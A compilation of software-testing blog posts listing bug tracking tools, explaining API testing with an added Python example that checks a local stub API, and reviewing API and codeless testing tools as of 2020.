article, we are going to list some open source bug tracking systems
along with commercial defect tracking systems.


You are a part of your organization. Why not suggest a defect tracking
tool to your team from the list below? A good tool helps your team get
organized and communicate effectively.

Also, it adds a feather on your hat by mentioning about defect tracking


tool in your interview process or preparation of a resume.

Earlier I have posted Sample Resume for Software Testers Freshers


and Experienced Professionals.
Don’t get confused with the terms defect and bug. Check this post to
get out of that chaos.
I always argue that just finding bugs is not the whole job of a QA; a QA can do a lot more. But one of our primary jobs is to find bugs in software. 😉

Click here to find how to write a good bug report. Also, I recommend
you go through this post on the bug life cycle. It gives a clear idea of
how a bug goes through the life cycle to be fixed in SDLC.
List of Popular Defect Tracking Tools:
Here I am going to list the tools used for defect tracking, both free and commercial ones.

1. Bugzilla
2. HP ALM
3. JIRA
4. Mantis
5. Trac
6. Redmine
7. FogBugz
8. YouTrack
9. BugNet
10. Backlog
11. ReQtest
12. eTraxis
13. Zoho
14. Axosoft
15. Lighthouse
16. BugHost
17. Instabug
I am listing both free and commercial bug tracking tools. Commercial tools offer free trials too, so you can play around with a tool before choosing a commercial one.

Now that you know of a list, let us take a look at each of them in detail.

BUGZILLA

Bugzilla is an open-source web-based bug tracking tool developed by Mozilla. It is one of the leading bug tracking tools used by many organizations.

It provides lots of features such as Advanced search capabilities, Email notifications, Scheduled Reports (Daily, Weekly, Hourly, etc.) by Email, Reports and Charts, Automatic Duplicate Bug Detection, File/Modify Bugs By Email, Time Tracking, Request System, Private Attachments and Comments and much more.

Type: Free
Click here to download
HP ALM

HP ALM is an application management solution to help you define, build, test, and deliver applications fast and with confidence across the entire Software Development Life Cycle (SDLC). It's a premium tool and has a free trial.

Type: Commercial and free trial available
Click here to download
JIRA (developed by Atlassian)

According to Atlassian, the JIRA defect tracking tool is used for issue tracking and project management by over 50,000 customers. Companies like Twitter, NASA, Audi, The Telegraph, and many more are using JIRA Software. Why still think about it? Give it a try. It is a commercial tool and it provides a free trial.

Type: Commercial and free trial available
Click here to download
Mantis

MantisBT is an open-source web-based issue tracking tool. It also provides a mobile version. Users are able to get started in minutes to manage their projects. It is compatible with Chrome, Firefox, Safari, Opera, and IE 7+, and has features like email notifications, chat, a mobile version, etc.

Type: It has both Free & Commercial versions (you get a 30-day free trial on commercial plans too)
Click here to download
Trac

Trac is an open-source, web-based project management and issue tracking tool. The features include project management, bug tracking, a search engine for tickets, email notifications, etc.
Type: Free (check @ official website)
Click here to download
Redmine

Redmine is an open-source, web-based project management and issue tracking tool. Some of the main features of Redmine are multiple projects support, flexible role-based access control, a flexible issue tracking system, Gantt chart, multi-language support, issue creation via email, etc.
Type: Free
Click here to download
FogBugz

FogBugz is a web-based project management and issue tracking tool. It comes with features like a powerful search engine, issue tracking, Agile project planning, project management, support help desk, time tracking, and discussion groups. It is used by over 20,000 software development teams.
Type: Commercial, but free for 2 users (on demand). Check the pricing page and confirm with the FogBugz support team if you intend to use it.
Click here to download
YouTrack

YouTrack is a web-based bug tracking tool and project management software developed by JetBrains. It allows you to install it on your own server. It includes features like Bug & Issue Tracking, Agile boards, Reporting, and Time Management.

Type: Free (stand-alone, installed on your server, for 10 users) & Commercial
Click here to download
BugNet

BugNET is a free, open-source issue tracking and project issue management solution for the ASP.NET platform.

Type: Free
Click here to download
Backlog

Backlog allows you to capture and track bugs, and seamlessly manage the end-to-end development of your products. Teams can easily recognize every bug in the workflow through this issue tracking tool. You can easily integrate the Backlog bug tracking tool with tools like Slack, Jenkins, Google Sheets importer, Email importer, iOS App, Android App, Typetalk, Redmine, and Jira Importer.

Type: Commercial and free trial available
Download Backlog bug tracker
ReQtest

ReQtest offers a bug tracking module that allows developers & testers to collaborate easily on fixing bugs. With ReQtest you can import all your bug reports from a CSV file. You can automatically synchronize ReQtest bugs with Jira issues. Also, you can easily integrate JIRA projects with ReQtest projects.

Type: Commercial and free trial available
Download ReQtest bug tracker
eTraxis

eTraxis is an open source bug tracking tool with the ability to set up an unlimited number of fully customizable workflows. "eTraxis" is an acronym of "extensible tracking system". eTraxis can be used for tracking almost anything, but the most popular cases are a bug tracker, a helpdesk, and even a CRM system.

Type: Open source
Download eTraxis bug tracker
Zoho

Zoho Bug Tracker is an online bug tracker and issue tracking software that helps you to track and fix bugs quickly. You can easily integrate the Zoho bug tracking tool with tools like Google, GitHub, Bitbucket, Dropbox, Zoho Analytics, Zoho Desk, Zoho Books, and Zapier.

Type: Commercial and free trial available
Download Zoho bug tracker
Axosoft

Axosoft is a bug tracking system that can be used as on-premises software or as hosted software. It allows you to manage your user stories, bugs, and support tickets. Axosoft's Card View is a fully interactive kanban board that allows you to visualize items' statuses and progress in real time.

Type: Commercial and free trial available
Download Axosoft bug tracker
Lighthouse

Lighthouse is a web-based issue tracking application. No matter whether you're a large company or a small bootstrapped team, Lighthouse is the perfect ticket tracking solution to keep track of your project development with ease. It also integrates with dozens of useful services like Airbrake, Github, Exceptional, Beanstalk, etc.
Type: Commercial and free trial available
Download Lighthouse
BugHost

BugHost is a fully-featured bug tracker designed to serve enterprises and SMEs who need high-volume licensing at a reasonable price. It is easy to categorize, report, and delegate bugs. It provides an end-to-end solution designed for Windows. It allows you to record unlimited defects. Even your customers can directly post bugs to your project, and it comes with strong security protection for access to bugs.

Type: Commercial and free trial available
Download BugHost
Instabug

Instabug is a bug reporting tool for mobile apps. It empowers mobile teams to release with confidence through comprehensive bug and crash reports, in-app surveys, and real-time user feedback. You can connect Jira with Instabug to provide your users and testers with an easy way to share their feedback and report any bugs they find in your app.

Type: Commercial and free trial available
Download Instabug Bug Reporting Tool
Over To You:

I have just mentioned popular issue tracking tools here. If you are using any other issue tracker tools which are not listed here, please let us know in the comments section.
I would like to conclude here. If you find any other defect tracking tools handy and useful, please comment below. Here I have hand-picked a few posts which will help you to learn more about Software Testing.

API Testing | Learn API Testing | API Testing Tutorial
In this API Testing post, we will learn the following

1. What is an API
2. What is API Testing
3. API Testing Types
4. Common tests on APIs
5. Advantages of API Testing
6. What exactly needs to be verified in API Testing
7. Tools used for API Testing
8. Difference between API testing and Unit Testing
9. Challenges in API testing
10. API Testing Best Practices
What is an API?
API is an acronym that stands for Application Programming Interface. An API is a set of routines, protocols, and tools for building software applications. APIs specify how one software program should interact with other software programs.
Routine: a program that performs a particular task. A routine is also known as a procedure, function, or subroutine.

Protocol: a format for transmitting data between two systems.

In simple words, an API acts as an interface between two software applications and allows them to communicate with each other. An API is a collection of software functions that can be executed by another software program.
Let's see some examples of an API in a more approachable way.

Think of an API as a waiter at a restaurant.

At a restaurant, you give an order based on the items available on the menu. A waiter in the restaurant writes down your order and delivers it to the kitchen, which prepares your meal. Once the meal is ready, the waiter picks up your food from the kitchen and serves it to you at your table.
In this scenario, the waiter's role is similar to an API. Like a waiter, the API takes a request from a source, carries that request to the database, fetches the requested data from the database, and returns a response to the source.

Now let’s see another example.

Suppose you are using a flight search engine, say Expedia, to search for flights on a specific date. Once you enter the data such as Source, Destination, Onward Date, and Return Date and click on Search, Expedia sends a request to the airlines through an API as per your search details. The API then takes the airline's response to your request and delivers it right back to Expedia.

The API gets the request from the user and gives the response without exposing internal logic. In this sense an API acts like Abstraction in the OOPs concept.
What is API Testing?
API testing is a type of software testing that involves testing APIs directly and also as a part of integration testing, to check whether the API meets expectations in terms of functionality, reliability, performance, and security of an application. In API Testing our main focus is on the business logic layer of the software architecture. API testing can be performed on any software system which contains multiple APIs. API testing does not concentrate on the look and feel of the application; it is entirely different from GUI Testing.
Let's see how UI testing differs from API testing.
UI (User Interface) testing tests the graphical interface part of the application. Its main focus is the look and feel of an application. On the other hand, API testing exercises the communication between two different software systems. Its main focus is the business layer of the application.

API Testing Types

API testing typically involves the following practices:

• Unit testing: To test the functionality of individual operations
• Functional testing: To test the functionality of broader scenarios by using a block of unit test results tested together
• Load testing: To test the functionality and performance under load
• Runtime/Error Detection: To monitor an application to identify problems such as exceptions and resource leaks
• Security testing: To ensure that the implementation of the API is secure from external threats
• UI testing: Performed as part of end-to-end integration tests to make sure every aspect of the user interface functions as expected
• Interoperability and WS Compliance testing: A type of testing that applies to SOAP APIs. Interoperability between SOAP APIs is checked by ensuring conformance to the Web Services Interoperability profiles. WS-* compliance is tested to ensure standards such as WS-Addressing, WS-Discovery, WS-Federation, WS-Policy, WS-Security, and WS-Trust are properly implemented and utilized
• Penetration testing: To find vulnerabilities in an application that attackers could exploit
• Fuzz testing: To test the API by forcibly feeding unexpected input into the system in an attempt to force a crash
Refer: 100+ Types of Testing
Common tests on APIs:
Some of the common tests we perform on APIs are as follows.

• Verify whether the return value is based on the input condition. The response of the API should be verified against the request.
• Verify whether the system is authenticating the outcome when the API is updating any data structure
• Verify whether the API triggers some other event or requests another API
• Verify the behavior of the API when there is no return value
Advantages of API Testing:
• API Testing is time effective when compared to GUI Testing.
API test automation requires less code so it can provide faster
and better test coverage.
• API Testing helps us to reduce the testing cost. With API
Testing we can find minor bugs before the GUI Testing. These
minor bugs will become bigger during GUI Testing. So finding
those bugs in the API Testing will be cost-effective to the
Company.
• API Testing is language independent.
• API Testing is quite helpful in testing Core Functionality. We can
test the APIs without a user interface. In GUI Testing, we need
to wait until the application is available to test the core
functionalities.
• API Testing helps us to reduce the risks.
What exactly needs to be verified in API Testing?

Basically, in API Testing we send a request to the API with known data and we analyse the response.

• Data accuracy
• HTTP status codes
• Response time
• Error codes, in case the API returns any errors
• Authorization checks
• Non-functional testing such as performance testing and security testing
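The checks in this list, together with the security and fuzz testing items from the "API Testing Types" list above, as an added worked example that is not part of the original tutorial. The API under test is a constructed in-process stub (`api_get_user`, with a made-up `VALID_TOKEN` and a single sample user) standing in for a real HTTP service so the example runs offline; the test side verifies the HTTP status code, data accuracy against an expected response shape, response time, error codes for missing and malformed ids, authorization behaviour, and a fuzz-style pass in which every malformed id must produce a 4xx rather than a crash. Against a live service only `api_get_user` would change, to a real HTTP call.

```python
"""Added example: black-box API checks against a constructed in-process stub."""
import json
import time

# ---------------------------------------------------------------------------
# Constructed API under test (hypothetical). It stands in for a real HTTP
# service so that the example runs offline with no network access.
# ---------------------------------------------------------------------------
VALID_TOKEN = "token-for-alice"  # constructed sample credential, not a real secret
_USERS = {1: {"id": 1, "name": "Alice", "email": "alice@example.com"}}  # constructed data


def api_get_user(path, headers):
    """Simulated handler for GET /users/<id>. Returns (status_code, json_text)."""
    if headers.get("Authorization") != f"Bearer {VALID_TOKEN}":
        return 401, json.dumps({"error": "unauthorized"})
    prefix = "/users/"
    if not path.startswith(prefix):
        return 404, json.dumps({"error": "not found"})
    raw_id = path[len(prefix):]
    # str.isdigit() alone also accepts non-ASCII digits, which int() would
    # convert; requiring ASCII keeps the id validation strict.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return 400, json.dumps({"error": "id must be a positive integer"})
    user = _USERS.get(int(raw_id))
    if user is None:
        return 404, json.dumps({"error": "not found"})
    return 200, json.dumps(user)


# ---------------------------------------------------------------------------
# Test side: the verifications named in the tutorial, as checks on the status
# code, the parsed body, the timing and the authorization behaviour.
# ---------------------------------------------------------------------------
USER_SCHEMA = {"id": int, "name": str, "email": str}  # expected response shape

# Constructed malformed ids for the fuzz pass; the last one is the
# Arabic-Indic digit one, which str.isdigit() accepts but is not ASCII.
FUZZ_IDS = ("", "-1", "1.5", "abc", "1 ", "9" * 40, "%00", "\u0661")


def call(path, headers):
    """Issue one request and return (status, parsed_body, elapsed_seconds)."""
    start = time.perf_counter()
    status, text = api_get_user(path, headers)
    elapsed = time.perf_counter() - start
    return status, json.loads(text), elapsed


def check_schema(body, schema):
    """Data accuracy: exactly the expected fields, each with the expected type."""
    return set(body) == set(schema) and all(isinstance(body[k], t) for k, t in schema.items())


def fuzz_ids_rejected(headers, samples=FUZZ_IDS):
    """Fuzz-style negative test: every malformed id yields a 4xx and no exception."""
    for raw in samples:
        try:
            status, _, _ = call("/users/" + raw, headers)
        except Exception:  # an unhandled exception in the handler is itself a defect
            return False
        if not 400 <= status < 500:
            return False
    return True


def run_api_checks(max_latency_s=0.5):
    """Run every check and return a dict of check name -> passed (bool)."""
    auth = {"Authorization": f"Bearer {VALID_TOKEN}"}
    results = {}

    # Happy path: HTTP status code, data accuracy and response time.
    status, body, elapsed = call("/users/1", auth)
    results["status_200"] = status == 200
    results["schema_ok"] = check_schema(body, USER_SCHEMA)
    results["data_ok"] = body["id"] == 1 and body["name"] == "Alice"
    results["latency_ok"] = elapsed < max_latency_s

    # Error codes: an unknown resource and a malformed id are distinguishable.
    results["missing_is_404"] = call("/users/999", auth)[0] == 404
    results["bad_id_is_400"] = call("/users/abc", auth)[0] == 400

    # Authorization: no token and a wrong token are both rejected, and the
    # rejected response carries no user data.
    status, body, _ = call("/users/1", {})
    results["no_token_401"] = status == 401 and "email" not in body
    results["wrong_token_401"] = call("/users/1", {"Authorization": "Bearer wrong"})[0] == 401

    # Security / fuzz testing: malformed input never produces a 5xx or a crash.
    results["fuzz_rejected"] = fuzz_ids_rejected(auth)
    return results


if __name__ == "__main__":
    for name, passed in run_api_checks().items():
        print(f"{name:16} {'PASS' if passed else 'FAIL'}")
```

Each check is kept as a separate named result rather than one boolean so a failing run tells you which property broke (a 500 on a malformed id is a different defect from a schema drift), which is also how the tools listed later report results.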
Tools used for API Testing:
Some of the tools used for API Testing are as follows:
• Postman
• Katalon Studio
• SoapUI
• Assertible
• Tricentis Tosca
• Apigee
• JMeter
• Rest-Assured
• Karate DSL
• API Fortress
• Parasoft
• HP QTP(UFT)
• vREST
• Airborne
• API Science
• APIary Inspector
• Citrus Framework
• Hippie-Swagger
• HttpMaster Express
• Mockbin
• Ping API
• Pyresttest
• Rest Console
• RoboHydra Server
• SOAP Sonar
• Unirest
• WebInject
Refer to this link to learn more about these API Testing Tools
Difference between API testing and Unit Testing?
UNIT TESTING:
• Unit testing is conducted by the Development Team
• Unit testing is a form of White box testing
• Unit testing is conducted prior to the process of including the code in the build
• Source code is involved in Unit testing
• In unit testing, the scope of testing is limited, so only basic functionalities are considered for testing
API TESTING:
• API testing is conducted by QA Team
• API testing is a form of Black box testing
• API testing is conducted after the build is ready for testing
• Source code is not involved in API testing
• In API testing, the scope of testing is wide, so all the issues that are functional are considered for testing
Challenges in API testing:
Some of the challenges we face while doing API testing are as follows

• Selecting the proper parameters and their combinations
• Categorizing the parameters properly
• Proper call sequencing is required, as wrong sequencing may lead to inadequate coverage in testing
• Verifying and validating the output
• Due to the absence of a GUI it is quite difficult to provide input values
Types of bugs we face when performing API testing:
Issues observed when performing API testing are

• Stress, performance, and security issues
• Duplicate or missing functionality
• Reliability issues
• Improper messaging
• Incompatible error handling mechanism
• Multi-threaded issues
• Improper errors
API Testing Best Practices:
• Test for the expected results
• Add stress to the system by sending a series of API load tests
• Group API test cases by test category
• Create test cases with all possible input combinations for complete test coverage
• Prioritize API function calls to make them easy to test
• Create tests to handle unforeseen problems
• Automate API testing wherever it is possible
Here I have hand-picked a few posts which will help you to learn more.
• API Testing Interview Questions
• SOAP Interview Questions
• Postman Tutorial (API Testing using Postman)
Best API Testing Tools for 2020 (Updated list) | Software Testing Material
API testing (Application Programming Interface Testing) is a software testing type that focuses on determining whether the developed APIs meet expectations regarding the functionality, reliability, performance, and security of the application.
The interest in API testing has been growing steadily over the last couple of years, according to Google Trends. Research by Smartbear over 5,000 software professionals in 2017 showed that the number of API testers automating more than 50% of their tests was expected to grow by 30% (from 59% to 77%) in the next two years, and 80% of the survey participants reported they were responsible for testing APIs.
Having the right process, tool, and solution for API automation tests is more critical than ever. And with the shift-left trend, API testing is more than just a quality control solution; it is a crucial component of a successful CI/CD deployment.

Top 10 API Testing Tools for 2020
1. Katalon Studio
Katalon Studio is a free automation test tool providing a common
environment to create and execute UI functional, API/Web services,
and mobile testing.
The capability to combine UI and Business levels (API/Web services)
for different environments (Windows, Mac OS, Linux) has been
considered an advantage of Katalon Studio.

Katalon Studio supports SOAP and RESTful requests with various types of commands (GET, POST, PUT, DELETE) with parameterized capability.
– Highlights:

• Supports combination tests between UI and API verification.
• Supports testing both SOAP and RESTful requests.
• Hundreds of built-in keywords for creating test cases.
• Supports one of the most powerful assertion libraries, AssertJ, to create fluent assertions in BDD style.
• Supports the data-driven approach.
• Can be used for both automated and exploratory testing.
• Suitable for both pros and non-techies via the support of Manual and Groovy Scripting modes

Named as one of the 2020 Gartner Peer Insights Customers' Choices for Software Test Automation, Katalon Studio has received more than 600 positive reviews, affirming its position at the forefront of the market.
Website: Katalon Studio
Pricing: Free – $69/license/month
2. Postman
Being originally a Chrome browser plugin, Postman now extends its
solution with the native version for both Mac and Windows.

Complete Postman Tutorial

Postman is a good choice for API testing for those who don't want to deal with coding in an integrated development environment using the same language as the developers.
• Easy-to-use REST client
• Rich interface which makes it easy to use
• Can be used for both automated and exploratory testing
• Can be run on Mac, Windows, Linux & Chrome Apps
• Has a bunch of integrations like support for Swagger & RAML
formats
• Has Run, Test, Document and Monitoring Features
• Doesn’t require learning a new language
• Enable users to easily share the knowledge with the team as
they can package up all the requests and expected responses,
then send to their colleagues.
Website: Postman
Pricing: Free – $12/user/month
3. SoapUI
SoapUI is a headless functional testing tool dedicated to API testing,
allowing users to test REST and SOAP APIs and Web Services easily.

Using SoapUI, users can get the full source and build the preferred
features besides these abilities:

Free Package
• Create test quickly and easily with Drag-and-drop, Point-and-
click
• Reusability of Scripts allows load tests and security scans to be
reused for functional test cases in just several steps
Pro Package
• Powerful data-driven testing: Data loaded from files, and
databases, and Excel so that they can simulate how consumers
interact with the APIs
• Create complex-scenarios & support native CI/CD integrations,
asynchronous testing
SoapUI's latest version, 5.5, released in February 2019, introduced the Endpoint Explorer dialog for users to send exploratory requests and analyze responses without creating a project. The tool also supports extended HTTP methods such as PROPFIND, LOCK, UNLOCK, COPY, and PURGE.

Website: SoapUI
Pricing: Free – $659/year
4. Tricentis Tosca
Tricentis Tosca is a continuous testing platform for Agile and DevOps.
Benefits of Tricentis Tosca include:

• Supports a wide array of protocols: HTTP(s), JMS, AMQP, Rabbit MQ, TIBCO EMS, SOAP, REST, IBM MQ, NET TCP
• Integrates into the Agile and DevOps Cycle
• Maximize reuse and maintainability with model-based test
automation
• API tests can be used across mobile, cross-browser, packaged
apps, etc…
• Achieve sustainable automation with new technology
• Reduce the time of regression testing
• Interactive testing provides test managers with the ability to
execute manual testing and collect results without having to
configure Tosca environments.
The latest Tricentis Tosca version 13.1 released in March 2020 can
support web service security configuration in the API Connection
Manager. Users can use the signature security option to sign multiple
parts of a message. In addition, from Tosca version 13.0, testers are
allowed to read and write files dynamically with a file connection in the
API Engine.

Website: Tricentis
Pricing: Contact Sales
5. Apigee
Apigee is a cross-cloud API testing tool that allows users to measure and test API performance, and supports building APIs using other editors like Swagger.

Additionally, Apigee is recognized as one of the leaders in the Gartner Magic Quadrant 2019 for Full Lifecycle API Management for the fourth consecutive time.
• It is multi-step and powered by Javascript
• Allows the design monitor, deploy, and scale APIs
• Identify performance issues by tracking API traffic, error rates,
and response times
• Easily create API proxies from the Open API Specification and
deploy them in the cloud
• Cloud, on-premise, or hybrid deployment model on a single
code base
• PCI, HIPAA, SOC2, and PII for apps and APIs
• Apigee is purpose-built for digital business, and the data-rich
mobile-driven APIs and apps that power it.
Starting from February 2019 with the release of version 4.19.01,
Apigee gave users even more flexibility to manage their APIs with
features like Open API 3.0 support, TLS security, self-healing with
apigee-monit, virtual host management improvements, and more
software support. The latest 4.19.6.04 announced in Apr 2020 with
minor bug fixes only.

Website: Apigee
Pricing: Contact Sales
6. JMeter
JMeter (open source) is widely used for functional API testing although
it is actually created for load testing.
• Supports replaying of test results
• Automatically work with CSV files, allowing the team to quickly
create unique parameter values for the API tests.
• Users can include the API tests in CI pipelines thanks to the integration between JMeter and Jenkins
• It can be used for both static as well as dynamic resources
performance testing
The most recent release in November 2019 is JMeter 5.2. The tool
has been packed with multiple features and enhancements, improved
user experience, and many bug fixes, such as new protocol,
JMESPath extractor, JDBC improvements, StringtoFile, HTTP
Samplers.

Website: JMeter
Pricing: Open source
7. Rest-Assured
Rest-Assured is an open-source Java Domain-specific language that
makes testing REST service more simple.
• Have a bunch of baked-in functionalities, which means users
don’t have to code things from scratch.
• Integrates seamlessly with the Serenity automation framework,
so that users can combine the UI and REST tests all in one
framework that generates awesome reports.
• Support BDD Given/When/Then syntax
• Users don’t necessarily need to be an HTTP expert
Starting from version 4.0.0, Rest-Assured requires at least Java 8, instead of Java 6 as was previously required. This version also added support for Apache Johnzon and fixed a bunch of issues with the initial OSGi support. The latest version, 4.2.0, announced in January 2020, offers a nicer experience for Kotlin developers using the spring-mock-mvc module.

Website: Rest Assured
Pricing: Open Source
8. Assertible
Assertible is an API testing tool which concentrates on automation and reliability.

• Support for automating API tests through each step of a continuous integration and delivery pipeline.
• Support for running API tests after deployments; integrates with familiar tools like GitHub, Slack, and Zapier.
• Support for validating HTTP responses with turn-key assertions such as JSON Schema validation and JSON Path data integrity checks
• The Sync feature allows users to update tests when their specifications change, so they no longer have to manually update their tests after adding new parameters or changing the response of the API.
In October 2019, Assertible introduced its latest feature, Encrypted variables, which provides a new way to store tokens, passwords, and secret data fields required by tests to improve API testing security practices. Encrypted variables are not only trivial to use, but are built on a cryptographically sound methodology for safe storage.

Website: Assertible
Pricing: Free – $100/month
9. Karate DSL
Karate DSL is a new API testing tool which helps create scenarios for API-based BDD tests in a simple way without writing step definitions. Those definitions have been created by KarateDSL so that users can kickstart API testing quickly.

• Built on top of Cucumber-JVM
• Can run a test and generate reports like any standard Java project
• A test can be written without any Java knowledge required
• Tests are easy to write even for non-programmers
• Supports configuration switching/staging, multi-threaded parallel execution
Starting from the version 0.9.3, Karate UI is no longer part of the open-
source tool’s core but a separate Maven artifact. This version included
built-in support for WebSocket that is based on the async capability.
The latest update Karate UI 0.9.5 in February 2020, came with web
browser automation which allows users to submit a self-contained
snippet of HTML as a full-fledged project — to demo or replicate
issues.
Website: Karate
Pricing: Open Source
10. Swagger
Swagger is an API testing tool that allows users to start their
functional, security, and performance testing right from the Open API
Specifications. Swagger tooling and Ready API platform make it easy
to quickly create, manage, and execute API tests in the pipeline.

• Swagger Inspector provides capabilities to inspect API request-responses, and make sure they perform as expected
• Import user’s API definitions to easily validate schema rules,
automatically generate assertions against endpoints and inject
synthetic data into parameters
• Generate complex load scenarios to test the scale and
performance of API
• Support all types of services from REST, SOAP to GraphQL
With Open API Spec version 3.0 in March 2019, the new feature Swagger Hub Domains was introduced. With this feature, developers can take frequently used objects, path items, and responses, and store them in separate files to be referenced across multiple different API definitions. These re-usable Domains can be versioned, published, and shared for collaborative feedback among large teams.
Website: Swagger
Pricing: Open-source
11. No one-size-fit-all tools
It hurts, but true!

We believe the list above nominates the best solution available out
there if you are planning to adopt API automation testing. However,
like most of the solutions in this industry, finding the ideal-one-tool to
do it all is almost impossible.

Some may find the features of the commercial players (Postman, Tricentis Tosca, etc.) sufficient, but the cost of ownership will be the show-stopping factor. Open source solutions (Rest-Assured, Karate DSL, etc.) are affordable but require skilled resources and effort to implement the right frameworks. Tools which seem to strike a relative balance between cost and other factors, such as Postman and Katalon Studio, might have drawbacks for specific project types that need to be considered.

API testing has established its trend in automation testing, and more tools will be developed to serve the growing demands of software development teams. Finding the perfect tool is still tough, but the good news is that you have far more choices than before. Carefully consider your requirements and the pros and cons of each solution; try not to be too ambitious at the early stage, and trial the top 5 relevant candidates from the list above. With a POC for these solutions created, you will have a better knowledge of your project's critical factors and can fine-tune your shortlist. This approach gives you a good chance to identify a suitable tool for the current status and informs the next choice when your project is more mature.
This article was last modified in May 2020 and will be regularly
updated with the latest top API testing tools and their functionalities.
We love to hear your feedback. Leave a comment below if you have
any suggestions on API testing products!
I would love to hear your feedback and let me know if you have other
tools to record for the others’ reference.

Best Codeless Testing Tools In 2020 | Software Testing Material
I have to admit that coding is complicated, especially now that computers can carry out commands to varying degrees of sophistication. Products are growing at a fast pace in varied directions, so having testers try to learn many complex programming languages while finishing backlogs in weeks can be a frustrating experience. With the emergence of codeless testing tools, you don't have to concern yourself with such feats yet.

Basically, codeless test automation tools were originally made to help testers avoid extensive hours of programming. Codeless tools empower users to automate robust and reusable tests by combining Artificial Intelligence (AI) and Machine Learning algorithms into a self-healing mechanism, which ultimately leads to continuous test execution and consistent results. Another huge benefit is that codeless tools are more user-friendly. A host of supported integrations and features can transform complicated code into a simplified testing suite for all business teams to engage in testing regardless of their skill sets.
Codeless automation is increasingly endorsed as one of the most prominent automation testing trends in 2020.

Let's take a holistic view of the most popular codeless testing tools in 2020.
Katalon Studio
Katalon Studio is one of the best-renowned testing solutions for Web,
API, Mobile, and Desktop applications. With this tool, building a
framework from scratch is no longer a hurdle for beginners since they
can import a variety of external libraries.

Programmers are even equipped with abundant built-in keywords and dual-scripting interfaces to make it easier to advance their test scripts. Therefore, if you want to write test scripts right away and gather such design principles along the way, Katalon Studio would be a great fit.

Highlight features:
• No coding skillsets or complex figures required
• Web Recorder Utility takes in all movements on the app and transforms them into runnable code in the back-end
• BDD Cucumber capability allows stakeholders to take part in testing with ease
• Insightful analytics dashboard and reports
• CI/CD pipeline and ALM system integrations involving Git, Jenkins, qTest, Jira, CircleCI, etc.
• Smart Wait feature is a present for Selenium lovers to fully eliminate Selenium wait issues without writing any additional code
• Built-in and custom keywords to transfer keywords between test projects without any changes in the external behaviors
Named a 2020 Gartner Peer Insights Customers’ Choice for the Software Test Automation market, Katalon Studio holds a strong position in customers’ minds as the best option when they need a codeless testing tool.
Website: Katalon Studio
Pricing: Free – $759/year
Here is a Katalon Tutorial
TestCraft
TestCraft is an end-to-end codeless Selenium test automation platform. In the case of other codeless testing tools with record-and-playback features, whatever was recorded would be “played back” to test the app’s usability. If tweaking some code breaks the test, you might have to re-record it and let it run all over again.
TestCraft, on the other hand, offers “on-the-fly rebinding,” which refers to more hands-on execution of tests. You can fix the broken code immediately, thereby rebinding the elements. Tests are adjusted in real time without bothering about re-recording the entire test scenario.

Highlight features:
• No extra plugins required
• Run tests on multiple browsers simultaneously
• Create flows easily for application monitoring
• Detailed reports for every execution
• Reuse elements and flows across scenarios
• On-the-Fly fixing
• Dual output: data & scenario
• Multiple built-in integrations including Test Management, Issue
Management, Notifications & Communication
Website: TestCraft
Pricing: Commercial – Contact sales.
Perfecto

Trusted by many major enterprises, Perfecto provides Mobile, Web, and IoT quality solutions. Moreover, the R&D duty at Perfecto mainly focuses on ensuring its cloud-based solutions work smoothly despite any market changes such as new iOS or Android version updates, new browser or smartphone releases, and even new features or improvements made to the cloud offering.

Highlight features:
• Main performance indicators improve velocity and efficiency for
teams
• Combine data using AWS services like EC2, ECS, Lambda, S3,
DynamoDB, and more
• Tests can run on various Android devices in parallel
• Switch to a microservices framework to deliver same-day
support for the latest mobile and web operating systems
• Perfecto Connectivity Layer: Besides new releases, the engineers update both their internal stakeholders and customers every day about issues taking place and how to address them
• Integrate with Appium, Selenium, Espresso and more
Website: Perfecto
Pricing: From $3,600/year.
CloudQA

CloudQA provides a unified platform that meets a variety of testing requirements. Besides its record-and-playback tool, CloudQA also gives you an integrated reporting tool for quickly creating and scheduling regression testing suites.

Built on top of Selenium, CloudQA integrates with multiple third-party applications, which makes building test cases easier. Plus, your web page performance is constantly monitored at a fraction of the cost.

Highlight features:
• Monitoring many data sets geographically
• Real-time alert via a rich set of alerting options
• Recording to monitoring in less than 5 minutes
• Huge capacity to maintain up to 1000 tests easily
• Integrations with ALM tools, CI/CD pipeline, team
communication apps (Slack, SMS, webhooks), bug tracking
tools, and version control tools (GitHub, TFS)
Website: CloudQA
Pricing: From $1,188/year
Sikuli

Sikuli is a Python-based GUI test automation solution that automates anything you see on the screen, using its “Visual Image Match” method to recognize GUI elements. That means all the GUI elements are kept as images within the project. A massive benefit of Sikuli is that it can effectively automate Flash objects without their IDs or names, especially when the GUI components are stable.

In addition, along with Selenium WebDriver, Sikuli provides a very friendly Sikuli-script.jar that can automate Adobe video/audio players and Flash games without a single line of code.
Highlight features:
• Extensive support to automate Flash Objects/Websites
• “Visual Match” mechanism to powerfully automate desktop &
flash objects
• All methods can be accessed using screen class objects
• Easily integrate with Selenium and all other tools (see Sikuli
Tutorial of Selenium Integration)
• Not suitable for web automation tasks as it has no browser
recorder
Website: Sikuli
Pricing: Open-source
TestProject

TestProject is a free end-to-end test automation platform that makes Selenium and Appium testing easy. You can test web, mobile, and even APIs using open source technology without all the usual headaches that come with it. TestProject is the top free tool according to Gartner, with an average rating of 4.6/5 stars.

TestProject’s Key Benefits:
• Scriptless test recorder for non-technical users, with compatible export to Selenium and Appium
• Advanced scripting SDK (import existing Selenium and Appium
tests)
• Cloud test storage and page object repository
• Beautiful executive analytics and dashboards
• 200+ community-powered addons
• Built-in integrations for Sauce Labs, BrowserStack, Jenkins,
Slack, and more
Don’t bother with building and maintaining a bespoke Selenium test framework, when TestProject already helps you to:
• Create and execute tests on Windows, Linux, macOS, and even Docker
• Install and manage Selenium, Appium, and all required dependencies
• Distribute test execution locally and in the cloud
• Specify user and project permissions
Website: TestProject
Pricing: Free
Check this TestProject review for more details
TestingWhiz

TestingWhiz is a codeless automation testing tool that provides automated testing solutions to software companies for their Software, Web, Mobile, Database, Cloud, Web Services, and API testing. It automates, executes, and manages test cases effortlessly and efficiently.

Features:
• Fast Automation Engine to help you create automated test
cases, on a keyword and data-driven structure, object-based
architecture with Java scripting
• With its Visual Recorder, you can automate testing of desktop-
based applications, widgets as well as flash applications using
inputs from onscreen actions such as Input, Scroll, Clicks,
Cancel, and more.
• With its Integrated Mobile Recorder, you can automate test
recording on multiple mobile applications/devices.
• With its Integrated OCR Capability, you can reduce the need for
keying in data by detecting and extracting the text from images
• Integrated PDF and Excel Commands.
• Multiple web browsers support such as Chrome, Firefox,
Internet Explorer(IE) and Microsoft Edge along with Android and
iOS mobile browsers
Website: Testing-Whiz
